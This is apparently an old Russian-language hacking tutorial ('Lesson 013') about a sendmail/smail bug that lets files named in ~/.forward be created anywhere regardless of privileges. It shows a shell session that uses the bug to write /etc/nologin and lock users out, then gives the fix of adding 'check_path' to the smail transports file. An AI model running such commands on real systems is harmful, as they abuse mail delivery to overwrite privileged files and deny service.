2211
| ЗНАКОМСТВА | UKA.ru | Gossip.ru |Библиотека бесплатно! | massovka | vaticancitystate.ru | взрывЧАТка From 24.11.97
Lesson 013
----------

Цель: атака хоста через дырку #3 в sendmail.

Ошибка #3 (Устранено в Sendmail Version ?.?) 

Файлы указанные в ~/.forward могут быть созданы везде, независимо от привилегий.

user@psyops ~> echo "/etc/nologin" > ~/.forward
user@psyops ~> mail -r root user < /dev/null
user@psyops ~> echo "Site shutdown due to smail lameness" >!  /etc/no=
login
user@psyops ~> rlogin localhost
Site shutdown due to smail lameness
rlogin: connection closed.

Исправляется путем добыавления 'check_path' в следущую часть вашего 
/usr/lib/smail/transports файла: 

[...]
# file - deliver mail to files
#
# This is used implicitly when smail encounters addresses which begin with
# a slash or squiggle character, such as "/usr/info/list_messages" or
# perhaps "~/Mail/inbox".
file:   driver =3D appendfile,
return_path, local, from, unix_from_hack;

file =3D $user,                   # file is taken from address
append_as_user,                 # use user-id associated with address
expand_user,                    # expand ~ and $ within address
check_path,   #<--add this line
suffix =3D "\n",
mode =3D 0644
[....]

PS. Thanx to Hacknet group

123123
| ЗНАКОМСТВА | UKA.ru | Gossip.ru | lib.uka.ru | Flash memory: SD, MMC, miniSD, CF | взрывЧАТка From 24.11.97
uka.ru